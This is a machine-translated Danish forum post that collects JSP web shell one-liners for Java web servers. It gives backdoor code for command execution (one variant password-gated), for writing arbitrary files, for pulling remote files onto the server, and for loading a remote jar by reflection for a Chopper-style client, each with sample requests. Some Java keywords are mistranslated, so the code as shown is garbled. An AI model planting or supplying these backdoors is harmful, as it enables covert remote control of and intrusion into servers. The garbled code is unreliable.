|
|
Opslået på 02/01/2015 18.46.57
|
|
|
|
Overført fra: http://p2j.cn/?p=1627
1. Udfør systemkommandoer:
Udfør systemkommandoer uden echo:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Anmodning: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Der vil ikke være noget ekko efter eksekveringen, hvilket er meget praktisk for bounce shells.
Der er ekkoer med adgangskodeverifikation:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = ny byte[2048]; out.print("<pre>"); mens((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); }%>
Anmodning: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls
2. Koder strengen og skriv den til den angivne fil:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Anmodning: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Skriv til webkataloget:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Anmodning: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Anmodning: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Skriv til webkataloget:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Anmodning: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Download fjernfilen (hvis du ikke bruger Apache IO Utils, kan du ikke konvertere inputstrømmen til byte, så den er meget lang...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = ny byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; mens ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Anmodning: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Download til webstien:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = ny byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; mens ((a = in.read(b)) != -1) { baos.write(b, 0, a); } ny java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Anmodning: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Fire: Refleksion kalder den eksterne krukke, perfektioner bagdøren
Hvis du ikke kan lide, at ovenstående bagdørsfunktion er for svag og forældet, kan du prøve dette:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Anmodning: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A
Køkkenkniv-forbindelse: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, adgangskode 023.
Løsning:
Brug refleksion til at indlæse en ekstern jar i den aktuelle applikation, og refleksion udfører outputbehandlingsresultatet. request.getParameterMap() indeholder alle de ønskede parametre. Da den eksterne jar-pakke indlæses, skal serveren kunne få adgang til denne jar-adresse. |
Tidligere:Krisen bag TXT-tekstfilenNæste:Java MD5-kryptering, Base64-kryptering og dekryptering Java udfører systemkommando-kildekode
|
Opslået på 02/01/2015 20.17.30
|
Udlejer|
Opslået på 02/01/2015 20.39.44
|
